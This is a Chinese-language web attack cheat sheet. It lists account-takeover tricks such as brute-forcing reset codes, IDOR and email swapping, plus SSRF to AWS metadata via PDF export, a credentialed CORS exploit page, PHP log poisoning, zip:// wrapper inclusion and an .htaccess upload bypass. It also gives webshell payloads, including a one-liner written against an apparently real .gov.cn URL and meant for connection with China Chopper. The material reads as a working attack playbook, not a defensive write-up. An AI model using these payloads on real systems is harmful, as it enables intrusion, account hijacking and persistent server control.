#防撞库

#SQL注入

#万能密码

#短信轰炸

#明文传输(抓包看post)

#盲打XSS

#查找上传(申请友链,头像,敏感页面等)

#查找编辑器

#查找phpmyadmin等管理程序尝试弱口令登陆

#移动端密码重置

1.输入手机号发送重置密码请求,收到4/6位验证码,尝试暴力破解(存在频率限制,但不会对请求执行黑名单化行为)
2.在竞态条件之下,使用多个IP地址向Instagram后端发送多个密码重置的确认码并发请求

#越权漏洞

1.直接在用户名后尝试不同的用户ID越权登陆(登陆/创建联系人/添加用户等功能)
2.a)创建账号前抓包,传入未注册邮箱信息看Response(可能返回auth_token值); b)根据post得知获取用户信息的路径; c)在 burpsuite的代理历史中查看有哪些请求用到了auth_token; d)浏览器隐身模式登陆对应URL(成功登陆劫持);

#绕过密码确认限制

1.未设置验证的情况下,发送修改密码申请并抓包修改目标用户邮箱为自己的邮箱,成功修改用户密码并登陆
2.通过测试账号找到注册邮箱更改路径,抓包根据具体的post内容修改用户邮箱为自己的邮箱

#存在允许将信息导出为PDF的功能(大部分为HTML转PDF),在源信息中输入一些HTML代码之后,就能让目标应用在服务端执行相应的HTML代码

例:通过请求AWS元数据服务查看敏感信息

1
<iframe src="http://169.254.169.254/latest/meta-data">

#COSR(跨站资源共享策略配置不当)未设置访问源白名单并具备规则

Access-Control-Allow-Credentials: true
概念验证代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<html>

<body>

<h2>CORS PoC</h2>

<div id="demo">

<button type="button" onclick="cors()">Exploit</button>

</div>

<script>

function cors() {

var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function() {

if (this.readyState == 4 && this.status == 200) {

document.getElementById("demo").innerHTML = alert(this.responseText);

}

};

xhr.open("GET",

"https://api.company.com/endpoint", true);

xhr.withCredentials = true;

xhr.send();

}

</script>

</body>

</html>

#PHP文件包含

#日志(具有读权限)

1.查找日志文件存放位置:
1)利用文件包含漏洞去读取apache日志默认在/etc/httpd/logs/access_log
2)找apache配置文件,通过任意文件读取漏洞配置文件找到日志路径/etc/httpd/conf/httpd.conf
1.插入PHP代码:
1)使用burpsuit抓包访问,绕过浏览器编码<>
2)curl访问不存在的url

1
curl http://192.168.192.1/a.php?=<?php phpinfo(); ?>

#会话文件
#php..// 访问URL通过post提交PHP代码并执行

例:写入一句话木马

1
<?php fwrite(fopen("xxx.php","w"),'<?php eval($_POST["cc"]);?>');?>

#.htaccess文件突破黑名单(上传格式限制)

1.自定义.htaccess上传

1
2
3
<FileMatch “test.jpg”>
SetHandler application/x-httpd-php
</FileMatch>

2.同目录下上传保存为jpg格式的一句话,成功绕过限制

#php流封装绕过截断

例:设文件包含代码为:

1
2
3
<?php 
$a = $_GET['file'];
include $a.'.html.php';

%00无法截断,只能包含xxxx.html.php
1.新建一个hello.html.php,内容为phpinfo();
2.压缩成zip
3.访问网址[http://localhost/test/blog.php?file=zip://test.zip%23hello],成功包含压缩文件内的hello.html.php

#通用防注入系统getshell

1.网站的目录存在sqlin.asp保存注入记录 可以写入一句话木马
例:

1
http://pzzl.gov.cn/sqlin.asp?id=1 and 1=<%eval request("salt")%>

2.若失败,则对一句话木马进行简单加密,用菜刀进行连接